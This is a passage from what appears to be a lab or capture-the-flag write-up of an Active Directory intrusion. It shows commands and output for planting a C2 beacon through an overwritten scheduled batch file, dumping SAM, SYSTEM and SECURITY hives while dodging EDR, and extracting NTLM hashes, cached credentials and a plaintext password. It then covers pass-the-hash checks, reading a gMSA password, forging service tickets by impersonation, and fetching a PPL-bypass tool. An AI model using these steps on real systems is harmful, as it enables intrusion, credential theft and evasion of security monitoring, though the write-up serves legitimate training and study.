red@start:~$ socat TCP-LISTEN:4321,reuseaddr,fork TCP:10.8.0.131:443

Upload our beacon:

PS C:\Users\platinette\Documents> cd c:\programdata
PS C:\programdata> mkdir .sample
PS C:\programdata> cd .sample
PS C:\programdata\.sample> !upload c0nn3ct.exe c.exe

Alter the content of emptydb.bat to execute our beacon:

PS C:\programdata\.sample> cd c:\autocmd
PS C:\autocmd> type emptydb.bat
sqlcmd -S dbOne.divafutura.loc -U malone@ifixtcentcen.loc -P SGnucc%%erE -Q "delete from passwd where user like '%evil%';"

PS C:\autocmd> Set-Content -Path "emptydb.bat" -Value "C:\programdata\.sample\c.exe" -Encoding ASCII
PS C:\autocmd> type emptydb.bat
C:\programdata\.sample\c.exe

A few moment later we got our callback:

image

image

As the color of the desktop icon is red then we gain a session with High process integrity level ^^.

Load all modules in AdaptixC2 client: Main menu -> AxScript -> Script manager, then Context menu -> Load new and select the extension-kit.axs file:

image

Check the privileges:

[08/08 15:36:00] admin [b704c6c8] beacon > whoami
[08/08 15:36:00] [*] BOF implementation: whoami /all
[08/08 15:36:04] [*] Agent called server, sent [6.42 Kb]
[08/08 15:36:04] [+] BOF output

UserName		SID
====================== ====================================
IFIXTCENTCEN\malone	S-1-5-21-1056286280-4062139808-1633864337-1113


GROUP INFORMATION                                 Type                     SID                                          Attributes               
================================================= ===================== ============================================= ==================================================
IFIXTCENTCEN\Domain Users                         Group                    S-1-5-21-1056286280-4062139808-1633864337-513 Mandatory group, Enabled by default, Enabled group, 
Everyone                                          Well-known group         S-1-1-0                                       Mandatory group, Enabled by default, Enabled group, 
BUILTIN\Administrators                            Alias                    S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner, 
BUILTIN\Users                                     Alias                    S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\BATCH                                Well-known group         S-1-5-3                                       Mandatory group, Enabled by default, Enabled group, 
CONSOLE LOGON                                     Well-known group         S-1-2-1                                       Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\Authenticated Users                  Well-known group         S-1-5-11                                      Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\This Organization                    Well-known group         S-1-5-15                                      Mandatory group, Enabled by default, Enabled group, 
LOCAL                                             Well-known group         S-1-2-0                                       Mandatory group, Enabled by default, Enabled group, 
IFIXTCENTCEN\Comparse                             Group                    S-1-5-21-1056286280-4062139808-1633864337-1122 Mandatory group, Enabled by default, Enabled group, 
Service asserted identity                         Well-known group         S-1-18-2                                      Mandatory group, Enabled by default, Enabled group, 
Mandatory Label\High Mandatory Level              Label                    S-1-16-12288                                  Mandatory group, Enabled by default, Enabled group, 


Privilege Name                Description                                       State                         
============================= ================================================= ===========================
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process                Disabled                      
SeTcbPrivilege                Act as part of the operating system               Disabled                      
SeSecurityPrivilege           Manage auditing and security log                  Disabled                      
SeTakeOwnershipPrivilege      Take ownership of files or other objects          Disabled                      
SeLoadDriverPrivilege         Load and unload device drivers                    Disabled                      
SeSystemProfilePrivilege      Profile system performance                        Disabled                      
SeSystemtimePrivilege         Change the system time                            Disabled                      
SeProfileSingleProcessPrivilegeProfile single process                            Disabled                      
SeIncreaseBasePriorityPrivilegeIncrease scheduling priority                      Disabled                      
SeCreatePagefilePrivilege     Create a pagefile                                 Disabled                      
SeBackupPrivilege             Back up files and directories                     Disabled                      
SeRestorePrivilege            Restore files and directories                     Disabled                      
SeShutdownPrivilege           Shut down the system                              Disabled                      
SeDebugPrivilege              Debug programs                                    Disabled                      
SeSystemEnvironmentPrivilege  Modify firmware environment values                Disabled                      
SeChangeNotifyPrivilege       Bypass traverse checking                          Enabled                       
SeRemoteShutdownPrivilege     Force shutdown from a remote system               Disabled                      
SeUndockPrivilege             Remove computer from docking station              Disabled                      
SeManageVolumePrivilege       Perform volume maintenance tasks                  Disabled                      
SeImpersonatePrivilege        Impersonate a client after authentication         Enabled                       
SeCreateGlobalPrivilege       Create global objects                             Enabled                       
SeIncreaseWorkingSetPrivilege Increase a process working set                    Disabled                      
SeTimeZonePrivilege           Change the time zone                              Disabled                      
SeCreateSymbolicLinkPrivilege Create symbolic links                             Disabled                      
SeDelegateSessionUserImpersonatePrivilegeObtain an impersonation token for another user in the same sessionDisabled
[08/08 15:36:04] [+] BOF finished

+--- Task [b704c6c8] closed ----------------------------------------------------------+

malone is member of BUILTIN\Administrators then he is local admin.

We check also other users:

[08/08 17:40:05] admin [dc651272] beacon > ls
[08/08 17:40:05] [*] Task: list of files in a folder
[08/08 17:40:09] [*] Agent called server, sent [18 bytes]
[08/08 17:40:09] [+] List of files in the 'C:\Users' directory
 Type     Size           Last Modified         Name
 ----     ---------      ----------------      ----
 dir                     09/05/2025 14:25      Administrator
 dir                     25/04/2025 17:15      Administrator.IFIXTCENTCEN
 dir                     15/09/2018 07:28      All Users
 dir                     26/04/2025 02:11      Default 
 dir                     15/09/2018 07:28      Default User
 dir                     27/04/2025 21:27      ilona   
 dir                     29/07/2025 22:28      malone  
 dir                     26/04/2025 09:05      platinette
 dir                     25/04/2025 17:11      Public  
 dir                     30/04/2025 20:39      schicchi
          0.17 Kb        15/09/2018 07:16      desktop.ini

+--- Task [dc651272] closed ----------------------------------------------------------+

schicchi has been connected to this server, that can be interesting because we did not yet pwned.

Credential dumping (MARYLINJESS$)

We use the module Hashdump to get the admin hash:

[08/08 15:47:35] admin [8ee0ed67] beacon > hashdump
[08/08 15:47:35] [*] BOF implementation: hashdump
[08/08 15:47:37] [*] Agent called server, sent [16.31 Kb]
[08/08 15:47:38] [+] BOF output
[HASHDUMP] Dumped SAM and SYSTEM
[HASHDUMP] Found current control set: 1
[HASHDUMP] Bootkey: 746945a5656fe0c6becfc3ff421c9aca
[HASHDUMP] Decrypted bootkey: e9961202d079909dab202d194a2acd54
Administrator:500:f7752d7e2cf052a1ea62a00ddf5b2c8d
WDAGUtilityAccount:504:79a4acbe24f5e64c0ed41cf8e987b58e
[08/08 15:47:38] [+] BOF finished

+--- Task [8ee0ed67] closed ----------------------------------------------------------+

Dump all registry hives to be more stealth against the EDR:

[08/08 16:33:27] admin [71bc5ad3] beacon > shell "reg save hklm\sam c:\programdata\.sample\sam"
[08/08 16:34:46] admin [33208759] beacon > shell "reg save hklm\security c:\programdata\.sample\security"
[08/08 16:35:16] admin [31e9deac] beacon > shell "reg save hklm\system c:\programdata\.sample\system"

Download all:

PS C:\programdata\.sample> !download sam MARYLINJESS.sam
PS C:\programdata\.sample> !download security MARYLINJESS.security
PS C:\programdata\.sample> !download system MARYLINJESS.system

Then grab all credentials/hashes locally:

$ impacket-secretsdump -sam MARYLINJESS.sam -security MARYLINJESS.security -system MARYLINJESS.system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x746945a5656fe0c6becfc3ff421c9aca
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f7752d7e2cf052a1ea62a00ddf5b2c8d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:79a4acbe24f5e64c0ed41cf8e987b58e:::
[*] Dumping cached domain logon information (domain/username:hash)
IFIXTCENTCEN.LOC/Administrator:$DCC2$10240#Administrator#7bb34e60dbba5e769df87474c0ccfb81: (2025-05-09 07:35:37+00:00)
ifixtcentcen.loc/platinette:$DCC2$10240#platinette#24e87dd52a197dce56387e2697efa876: (2025-07-29 12:38:59+00:00)
IFIXTCENTCEN.LOC/malone:$DCC2$10240#malone#7a083e341d6df2973b3467c6fbaf3f5d: (2025-04-25 21:20:03+00:00)
IFIXTCENTCEN.LOC/schicchi:$DCC2$10240#schicchi#b18ae2c8c3e83d877e4f0939c80b684c: (2025-08-06 12:38:22+00:00)
ifixtcentcen.loc/ilona:$DCC2$10240#ilona#8861b28eafb2d8f7fea6930a6e011037: (2025-07-29 12:37:04+00:00)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:334b6a826c17f46bbddcf7cdba5579424de296dc563c9e049d133f9e48cd04568bc734cc9a61e6c08e979aa6ecd7937aea885db1ce2452d3c2650bab4e9b8880f7995fc4fd411ea5e293d71b2289d415b48920f56cc2ba5e251f0396e34863664bca6ae40fe02bff89f85ef33a2fc974e3f0629bd9b4dc0355551800eacf80816d55dcce8b434f5d5fa04a3b03f067319e43ea9aa7a80e681b29de4ce727e030ef6b8ce1303c9036e24cbbaf074ac1366e243afd9d272c867ce29c8a455716540f4e43171026e28df5c164c327a2f5a28275e7f2fb446ad05c352bb39d0d53bdc07dfd61c77517cbd9a3607be77d0964
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:1844120e1af8402d3bf6356e862f6049
[*] DefaultPassword 
(Unknown User):Password%mary
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xf4e597bf7783ba802afceddc395d195f3b783ab6
dpapi_userkey:0xa2c473a9bf887ab4b15348a938d4c73b45a2f946
[*] M$MachineBoundCertificate 
 0000   76 00 00 00 01 00 00 00  03 03 00 00 03 03 00 00   v...............
 0010   00 00 00 00 17 00 00 00  64 00 00 00 01 00 00 00   ........d.......
 0020   01 01 00 00 01 00 00 00  CD 53 8B F3 E8 A2 31 81   .........S....1.
 0030   60 94 5E 8A FA 07 6D C1  F3 6C F1 A8 CA B6 FB 7B   `.^...m..l.....{
 0040   0E 3A FA FF CA 32 D7 10  19 50 4C E1 61 86 A2 E3   .:...2...PL.a...
 0050   2A 9A 06 D9 D8 99 29 B5  01 00 00 00 00 00 00 00   *.....).........
 0060   00 00 00 00 00 00 00 00  01 00 00 00 88 02 00 00   ................
 0070   4C 73 61 49 73 6F 41 73  79 6D 6D 65 74 72 69 63   LsaIsoAsymmetric
 0080   4B 65 79 42 6C 6F 62 E0  A5 AC 53 6D 1B CC 18 8B   KeyBlob...Sm....
 0090   37 54 1D D0 94 10 01 21  E8 73 EE 46 CD A8 03 C3   7T.....!.s.F....
 00a0   E4 51 D4 4A 87 29 33 8A  87 6F F7 0D BF D5 D2 3B   .Q.J.)3..o.....;
 00b0   31 C9 A7 A0 95 96 1F 78  03 E6 E1 97 F4 1D 85 53   1......x.......S
 00c0   06 F2 06 8D 5F 74 DB F0  CD 1C B3 90 8B 35 84 90   ...._t.......5..
 00d0   25 7A 4A D6 92 E8 83 0E  F2 C1 9E 29 EE B7 E6 0F   %zJ........)....
 00e0   E7 81 8B 3E 3D 22 63 91  E5 12 6D 08 30 C6 64 36   ...>="c...m.0.d6
 00f0   2F D7 20 2D 85 13 75 6E  FE 9A BA 53 87 70 D1 A5   /. -..un...S.p..
 0100   AC FC BE CB BD 89 FF 22  D0 82 CF 3A 90 2E FB 70   ......."...:...p
 0110   1D 34 75 07 EC 52 AF FF  EC AA E9 3C B9 DB 43 3B   .4u..R.....<..C;
 0120   82 19 1B 30 53 0A 5A AA  0C 7B 84 49 2B CF 86 B0   ...0S.Z..{.I+...
 0130   0F DC 5E 4F 06 1D CA D4  A0 7E 07 9F 75 F2 0E 2B   ..^O.....~..u..+
 0140   42 93 7C 84 79 8D 22 20  86 A5 D4 09 0C 7E F4 7B   B.|.y." .....~.{
 0150   D8 D3 52 E5 6E CB 3B 0C  F5 F3 54 5F 66 C3 FE 54   ..R.n.;...T_f..T
 0160   71 D0 C2 74 C6 97 1D C5  A6 8E B3 D3 A9 8E F3 06   q..t............
 0170   6D 37 AF AB 99 78 D4 AE  0E E7 ED 9F D9 F2 30 BF   m7...x........0.
 0180   D8 4F 64 7F E2 45 B3 1A  49 64 48 DB 3C 86 BE 28   .Od..E..IdH.<..(
 0190   9A 77 23 89 10 6D 1F D9  07 EA 50 35 5A 4E DE 69   .w#..m....P5ZN.i
 01a0   9C D9 1A B4 C4 88 9C B6  70 3E 58 FC 6D 13 6B 02   ........p>X.m.k.
 01b0   70 BA D6 F0 5F BD 2E 51  20 6E E3 6E 66 2F D7 B5   p..._..Q n.nf/..
 01c0   DD 0B 08 53 3E 4E 98 99  DC 5E F4 1E 3B 70 06 44   ...S>N...^..;p.D
 01d0   68 28 E8 31 68 5B DD 08  56 15 AA C1 9F 09 ED 24   h(.1h[..V......$
 01e0   13 C0 F9 AA 92 E2 0F AF  E0 8B C5 B4 36 C0 B4 34   ............6..4
 01f0   C3 B9 8F CB DB 52 72 B5  DB 6E A9 7F B4 18 A7 8E   .....Rr..n......
 0200   16 59 C7 24 2A 42 4A E0  FA C5 67 0F 56 51 1C F3   .Y.$*BJ...g.VQ..
 0210   C4 6F 6B 0D 45 42 58 79  67 23 71 6D 0F 2D FC F3   .ok.EBXyg#qm.-..
 0220   2D BC 99 51 CD CE D6 78  02 9A 5A 90 34 C0 9A 1E   -..Q...x..Z.4...
 0230   EB 65 3B 26 C9 00 30 15  A5 52 06 B2 D1 DC 21 90   .e;&..0..R....!.
 0240   4F 35 9B 72 F2 47 96 61  5E 74 7B CA BA E6 90 49   O5.r.G.a^t{....I
 0250   96 D0 E6 12 C8 0E 6B 71  EC 4D C8 BD 72 AA 6E CA   ......kq.M..r.n.
 0260   74 5F 28 64 42 0E 8F D5  6C 55 65 4C 57 93 20 76   t_(dB...lUeLW. v
 0270   10 4F 6B B6 F3 89 74 37  CF 0E 32 AC E2 9D 8B 12   .Ok...t7..2.....
 0280   5D 9B 7B CB 1F 38 F7 70  C7 21 7B 09 F0 DD 45 67   ].{..8.p.!{...Eg
 0290   3A 3C DD F8 51 44 86 12  96 E5 AF 41 0F 27 96 B9   :<..QD.....A.'..
 02a0   DA F7 78 0E 31 22 2D B4  98 EC EC 14 AA 66 A9 67   ..x.1"-......f.g
 02b0   83 45 83 3F 71 5F 91 9F  CE 44 46 5F DF 7D 34 D2   .E.?q_...DF_.}4.
 02c0   F0 AF 3F 88 DF 44 1A 3A  0D 88 00 21 F4 24 76 49   ..?..D.:...!.$vI
 02d0   48 BC AD 2C 34 AA 2F AE  AE 77 F7 60 50 3A 4E F5   H..,4./..w.`P:N.
 02e0   49 91 C2 3F B7 50 5D 0E  CA 07 C7 6B F7 61 86 E9   I..?.P]....k.a..
 02f0   41 6D 02 35 8B 6F F1 6C  27 4D F8 C7 5F 95 6E F4   Am.5.o.l'M.._.n.
 0300   C8 FD 07 7D B6 AB 00 21  D5 69 4A 3D 1B D3 13 20   ...}...!.iJ=... 
 0310   00 00 00 01 00 00 00 B1  02 00 00 30 82 02 AD 30   ...........0...0
 0320   82 01 95 A0 03 02 01 02  02 01 01 30 0D 06 09 2A   ...........0...*
 0330   86 48 86 F7 0D 01 01 0B  05 00 30 19 31 17 30 15   .H........0.1.0.
 0340   06 03 55 04 03 0C 0E 43  4E 3D 4D 41 52 59 4C 49   ..U....CN=MARYLI
 0350   4E 4A 45 53 53 30 20 17  0D 32 35 30 36 31 32 30   NJESS0 ..2506120
 0360   39 35 32 34 32 5A 18 0F  32 31 32 35 30 36 31 32   95242Z..21250612
 0370   30 39 35 32 34 32 5A 30  19 31 17 30 15 06 03 55   095242Z0.1.0...U
 0380   04 03 0C 0E 43 4E 3D 4D  41 52 59 4C 49 4E 4A 45   ....CN=MARYLINJE
 0390   53 53 30 82 01 22 30 0D  06 09 2A 86 48 86 F7 0D   SS0.."0...*.H...
 03a0   01 01 01 05 00 03 82 01  0F 00 30 82 01 0A 02 82   ..........0.....
 03b0   01 01 00 CA 34 52 1F B3  4B D9 E4 B0 F1 9F 67 F9   ....4R..K.....g.
 03c0   38 06 4B D9 7D A3 1B 6D  2B E5 C9 FC B2 BB 89 18   8.K.}..m+.......
 03d0   EF 69 71 44 FD 1D E1 F9  C1 64 BC 3E 99 23 9F 86   .iqD.....d.>.#..
 03e0   60 8D 7F 19 99 FF 70 ED  E0 F9 F6 25 90 9D C7 BB   `.....p....%....
 03f0   8F 66 EF 31 AD D7 C1 C4  8B 66 92 5B 66 0A 8C A2   .f.1.....f.[f...
 0400   46 45 D9 79 4A FC 9D E7  34 7C A4 64 16 5C 8C BE   FE.yJ...4|.d.\..
 0410   24 82 47 4F C5 14 02 65  A4 17 64 01 E6 A1 60 51   $.GO...e..d...`Q
 0420   E1 2E F9 DC C8 84 4F 47  83 51 09 B0 E2 37 B2 2A   ......OG.Q...7.*
 0430   92 DB 4A B9 CD 0F 92 E5  0D 26 96 22 2D 11 4E 09   ..J......&."-.N.
 0440   83 64 E6 75 81 04 00 9C  DB 03 85 AA CD 71 34 AD   .d.u.........q4.
 0450   81 2A 71 DF C2 D9 DF D3  77 56 10 F5 E1 1C D6 02   .*q.....wV......
 0460   6C 4E 08 17 8C 7E CB 7F  74 82 0C 28 CE 7E 6C 4E   lN...~..t..(.~lN
 0470   E7 FC D4 23 72 2D 6D 29  6F 1D 2D 33 AF 49 70 34   ...#r-m)o.-3.Ip4
 0480   28 42 DD 3A 73 23 02 E2  A9 2D 7C F8 E7 14 13 20   (B.:s#...-|.... 
 0490   E6 B7 4B 33 61 00 5F 80  40 79 61 EE 5B AC BE A9   ..K3a._.@ya.[...
 04a0   A9 25 FD A5 AF 58 74 B4  2F FC 57 EE C7 1A C9 FE   .%...Xt./.W.....
 04b0   B8 AF F1 02 03 01 00 01  30 0D 06 09 2A 86 48 86   ........0...*.H.
 04c0   F7 0D 01 01 0B 05 00 03  82 01 01 00 3B D9 72 33   ............;.r3
 04d0   8C A0 AB FD 1D 53 70 4C  23 6A 41 42 E7 AA 9B 81   .....SpL#jAB....
 04e0   63 50 10 E7 2D 36 C3 B3  20 BB 7C 8A D6 5A E5 DA   cP..-6.. .|..Z..
 04f0   68 8B 11 CD FA 19 04 29  D8 8D BA 7A B2 B1 57 B5   h......)...z..W.
 0500   99 5F 1A 11 AF 6F F5 00  FB 31 54 9C 30 63 2C 72   ._...o...1T.0c,r
 0510   F8 A0 12 6F 2D 83 32 7A  9F 7B 51 E2 9B F2 C4 3F   ...o-.2z.{Q....?
 0520   07 AB BC DD 37 A2 60 31  6E 4B F1 D8 AE 28 0A 36   ....7.`1nK...(.6
 0530   96 AE 6C 9D 67 10 C5 3A  63 49 12 13 5A 6F C9 54   ..l.g..:cI..Zo.T
 0540   92 24 DF B7 71 5B 7B 1B  DE B1 84 E4 D8 51 9F 7E   .$..q[{......Q.~
 0550   CE E4 8F E7 4D A7 80 5E  EB 6E 8D 4E 72 B6 93 17   ....M..^.n.Nr...
 0560   40 7C B9 07 00 C2 8B 64  F2 74 D1 01 09 23 29 84   @|.....d.t...#).
 0570   92 7A 67 06 D9 2A A5 D4  B8 BC 1D 72 BE D3 6C F7   .zg..*.....r..l.
 0580   68 F7 9F BE A3 8D 61 5D  49 E5 AA 30 7D 54 DD 49   h.....a]I..0}T.I
 0590   44 B3 28 5E 9F E4 59 A3  22 3E B1 43 FE 27 C9 F6   D.(^..Y.">.C.'..
 05a0   31 1D 28 6B DD 15 D5 C8  70 0C B0 7D 9A 07 0A FE   1.(k....p..}....
 05b0   14 70 DE B5 7C 6C 23 9B  D4 39 3A 2E 85 AE AD 05   .p..|l#..9:.....
 05c0   C5 72 54 E8 68 5A 88 16  57 92 1A 4B               .rT.hZ..W..K
M$MachineBoundCertificate:76000000010000000303000003030000000000001700000064000000010000000101000001000000cd538bf3e8a2318160945e8afa076dc1f36cf1a8cab6fb7b0e3afaffca32d71019504ce16186a2e32a9a06d9d89929b50100000000000000000000000000000001000000880200004c736149736f4173796d6d65747269634b6579426c6f62e0a5ac536d1bcc188b37541dd094100121e873ee46cda803c3e451d44a8729338a876ff70dbfd5d23b31c9a7a095961f7803e6e197f41d855306f2068d5f74dbf0cd1cb3908b358490257a4ad692e8830ef2c19e29eeb7e60fe7818b3e3d226391e5126d0830c664362fd7202d8513756efe9aba538770d1a5acfcbecbbd89ff22d082cf3a902efb701d347507ec52afffecaae93cb9db433b82191b30530a5aaa0c7b84492bcf86b00fdc5e4f061dcad4a07e079f75f20e2b42937c84798d222086a5d4090c7ef47bd8d352e56ecb3b0cf5f3545f66c3fe5471d0c274c6971dc5a68eb3d3a98ef3066d37afab9978d4ae0ee7ed9fd9f230bfd84f647fe245b31a496448db3c86be289a772389106d1fd907ea50355a4ede699cd91ab4c4889cb6703e58fc6d136b0270bad6f05fbd2e51206ee36e662fd7b5dd0b08533e4e9899dc5ef41e3b7006446828e831685bdd085615aac19f09ed2413c0f9aa92e20fafe08bc5b436c0b434c3b98fcbdb5272b5db6ea97fb418a78e1659c7242a424ae0fac5670f56511cf3c46f6b0d454258796723716d0f2dfcf32dbc9951cdced678029a5a9034c09a1eeb653b26c9003015a55206b2d1dc21904f359b72f24796615e747bcabae6904996d0e612c80e6b71ec4dc8bd72aa6eca745f2864420e8fd56c55654c57932076104f6bb6f3897437cf0e32ace29d8b125d9b7bcb1f38f770c7217b09f0dd45673a3cddf85144861296e5af410f2796b9daf7780e31222db498ecec14aa66a9678345833f715f919fce44465fdf7d34d2f0af3f88df441a3a0d880021f424764948bcad2c34aa2faeae77f760503a4ef54991c23fb7505d0eca07c76bf76186e9416d02358b6ff16c274df8c75f956ef4c8fd077db6ab0021d5694a3d1bd3132000000001000000b1020000308202ad30820195a003020102020101300d06092a864886f70d01010b050030193117301506035504030c0e434e3d4d4152594c494e4a4553533020170d3235303631323039353234325a180f32313235303631323039353234325a30193117301506035504030c0e434e3d4d4152594c494e4a45535330820122300d06092a864886f70d01010105000382010f003082010a0282010100ca34521fb34bd9e4b0f19f67f938064bd97da31b6d2be5c9fcb2bb8918ef697144fd1de1f9c164bc3e99239f86608d7f1999ff70ede0f9f625909dc7bb8f66ef31add7c1c48b66925b660a8ca24645d9794afc9de7347ca464165c8cbe2482474fc5140265a4176401e6a16051e12ef9dcc8844f47835109b0e237b22a92db4ab9cd0f92e50d2696222d114e098364e6758104009cdb0385aacd7134ad812a71dfc2d9dfd3775610f5e11cd6026c4e08178c7ecb7f74820c28ce7e6c4ee7fcd423722d6d296f1d2d33af4970342842dd3a732302e2a92d7cf8e7141320e6b74b3361005f80407961ee5bacbea9a925fda5af5874b42ffc57eec71ac9feb8aff10203010001300d06092a864886f70d01010b050003820101003bd972338ca0abfd1d53704c236a4142e7aa9b81635010e72d36c3b320bb7c8ad65ae5da688b11cdfa190429d88dba7ab2b157b5995f1a11af6ff500fb31549c30632c72f8a0126f2d83327a9f7b51e29bf2c43f07abbcdd37a260316e4bf1d8ae280a3696ae6c9d6710c53a634912135a6fc9549224dfb7715b7b1bdeb184e4d8519f7ecee48fe74da7805eeb6e8d4e72b69317407cb90700c28b64f274d10109232984927a6706d92aa5d4b8bc1d72bed36cf768f79fbea38d615d49e5aa307d54dd4944b3285e9fe459a3223eb143fe27c9f6311d286bdd15d5c8700cb07d9a070afe1470deb57c6c239bd4393a2e85aead05c57254e8685a881657921a4b
[*] NL$KM 
 0000   B7 AF CB F6 AD 48 19 7D  C2 75 8B 9B 8E 98 33 11   .....H.}.u....3.
 0010   B0 2E 2E 01 9E CF 76 49  82 12 57 07 9A C1 F7 69   ......vI..W....i
 0020   73 E0 58 1A 94 1B 32 E9  AE 5E 8C DA 12 81 6C 76   s.X...2..^....lv
 0030   EA 3B 64 55 34 EE BC 88  5D 82 4F F1 62 6B 42 A8   .;dU4...].O.bkB.
NL$KM:b7afcbf6ad48197dc2758b9b8e983311b02e2e019ecf7649821257079ac1f76973e0581a941b32e9ae5e8cda12816c76ea3b645534eebc885d824ff1626b42a8
[*] Cleaning up... 

Found:

  • Password%mary
  • $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:1844120e1af8402d3bf6356e862f6049 then we got MARYLINJESS$:1844120e1af8402d3bf6356e862f6049

Double check:

$ nxc smb SOC.ifixtcentcen.loc -u 'MARYLINJESS$' -H '1844120e1af8402d3bf6356e862f6049'
SMB         10.0.10.33      445    SOC              [*] Windows 10 / Server 2019 Build 17763 x64 (name:SOC) (domin:ifixtcentcen.loc) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.0.10.33      445    SOC              [+] ifixtcentcen.loc\MARYLINJESS$:1844120e1af8402d3bf6356e862f6049 
$ nxc smb MARYLINJESS.ifixtcentcen.loc -u administrator -p 'Password%mary' --local-auth    
SMB         10.0.10.34      445    MARYLINJESS      [*] Windows 10 / Server 2019 Build 17763 x64 (name:MARYLINJESS) (domin:MARYLINJESS) (signing:False) (SMBv1:False)
SMB         10.0.10.34      445    MARYLINJESS      [+] MARYLINJESS\administrator:Password%mary (Pwn3d!)

SOC - Act II

gMSA Password dumping (earlyfoxy$)

Check the computer objet MARYLINJESS$ in BHCE:

image

MARYLINJESS$ can retrieve the password for the GMSA (Group Managed Service Account) EARLYFOXY$.

$ bloodyAD --host SOC.ifixtcentcen.loc -d ifixtcentcen.loc -u 'MARYLINJESS$' -p ':1844120e1af8402d3bf6356e862f6049' get object 'EARLYFOXY$' --attr msDS-ManagedPassword

distinguishedName: CN=earlyfoxy,CN=Managed Service Accounts,DC=ifixtcentcen,DC=loc
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:d893c04b84f753f23b2c8b3c37fb6f05
msDS-ManagedPassword.B64ENCODED: lgH9JH4GgVXvlDst5MfeuU9t3Jcgum3hgT6ukGNfsd6iT6aYkAbtwNyrYSctULGIbeHNhTML09vpN0a9ehYWkOW41tJJV8D5SGyHePbKgPxLhpaowJI7ZUHCWOvs9kehzpBNXJ/L1lg/ZWdZu1RTENC7AZpAfx9QgMLjIrQ8rrfZ4ELgce0QrnQA11O+aWtwp0bmRipqziRjB+/oQL1wrT4hqnnV1xwuG6pfo1WNjIaiq2P3x1+NzGjzg95YoX5Lk7kcbhA02s6+lj0DtxSSZnLHcg4y+oETL+rnQ15OyGZgNc4L347LwvGoo5bnZawmDeghwwcDZiLTIZlNrKt+Ew==

OR

$ nxc ldap SOC.ifixtcentcen.loc -u 'MARYLINJESS$' -H '1844120e1af8402d3bf6356e862f6049' --gmsa             
LDAP        10.0.10.33      389    SOC              [*] Windows 10 / Server 2019 Build 17763 (name:SOC) (domain:ifixtcentcen.loc) (signing:None) (channel binding:No TLS cert)
LDAP        10.0.10.33      389    SOC              [+] ifixtcentcen.loc\MARYLINJESS$:1844120e1af8402d3bf6356e862f6049 
LDAP        10.0.10.33      389    SOC              [*] Getting GMSA Passwords
LDAP        10.0.10.33      389    SOC              Account: earlyfoxy$           NTLM: d893c04b84f753f23b2c8b3c37fb6f05     PrincipalsAllowedToReadPassword: MARYLINJESS$

Found earlyfoxy$:d893c04b84f753f23b2c8b3c37fb6f05.

Double check:

$ nxc ldap SOC.ifixtcentcen.loc -u 'earlyfoxy$' -H 'd893c04b84f753f23b2c8b3c37fb6f05'
LDAP        10.0.10.33      389    SOC              [*] Windows 10 / Server 2019 Build 17763 (name:SOC) (domain:ifixtcentcen.loc) (signing:None) (channel binding:No TLS cert)
LDAP        10.0.10.33      389    SOC              [+] ifixtcentcen.loc\earlyfoxy$:d893c04b84f753f23b2c8b3c37fb6f05

Get the Service Ticket of earlyfoxy$:

$ impacket-getST -spn 'host/GABRIEL.ifixtcentcen.loc' -impersonate 'earlyfoxy$' ifixtcentcen.loc/ilona:'!!!!Sweet!!!!' -dc-ip 10.0.10.33
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating earlyfoxy$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in earlyfoxy$@host_GABRIEL.ifixtcentcen.loc@IFIXTCENTCEN.LOC.ccache
$ export KRB5CCNAME=earlyfoxy\$@host_GABRIEL.ifixtcentcen.loc@IFIXTCENTCEN.LOC.ccache 
$ klist
Ticket cache: FILE:earlyfoxy$@host_GABRIEL.ifixtcentcen.loc@IFIXTCENTCEN.LOC.ccache
Default principal: earlyfoxy$@ifixtcentcen.loc

Valid starting       Expires              Service principal
08/08/2025 17:24:50  08/08/2025 17:39:50  host/GABRIEL.ifixtcentcen.loc@IFIXTCENTCEN.LOC
	renew until 08/09/2025 17:24:06

But seems we can’t login using this account to any servers…

PPL and Credential guard bypass (schicchi) (final flag)

In our C2 session, we list the processes and found some tools running by schicchi:

[08/08 20:46:45] admin [9a1a1b97] beacon > ps list
[08/08 20:46:45] [*] Task: show process list
[08/08 20:46:49] [*] Agent called server, sent [12 bytes]
[08/08 20:46:49] [+] Process list:
 PID     PPID    Session   Arch    Context                          Process
 ---     ----    -------   ----    -------                          -------
 4       0       0         x64                                      ├─ System
 ...
 3676    3392    1         x64     MARYLINJESS\Administrator *      ├─ explorer.exe
 2204    3676    1         x64     MARYLINJESS\Administrator *      │   ├─ schicchi.exe
 2804    2204    1         x64     MARYLINJESS\Administrator *      │   │   ├─ conhost.exe
 4904    2204    1         x64     IFIXTCENTCEN\schicchi            │   │   └─ cmd.exe
 3864    4904    1         x64     IFIXTCENTCEN\schicchi            │   │       ├─ notepad.exe
 4892    4904    1         x64     IFIXTCENTCEN\schicchi            │   │       └─ conhost.exe
$ sudo apt-get install mono-devel
$ git clone https://github.com/Leo4j/PPLKiller.git
$ cd PPLKiller
$ mono-csc /platform:x64 /out:PPLKiller.exe PPLKiller.cs
$ file PPLKiller.exe 
PPLKiller.exe: PE32+ executable for MS Windows 4.00 (console), x86-64 Mono/.Net assembly, 3 sections
[08/08 18:09:39] admin [7af54c3e] beacon > pwd
[08/08 18:09:39] [*] Task: print working directory
[08/08 18:09:40] [*] Agent called server, sent [12 bytes]
[08/08 18:09:41] [+] Current working directory:
c:\programdata\.sample

+--- Task [7af54c3e] closed ----------------------------------------------------------+

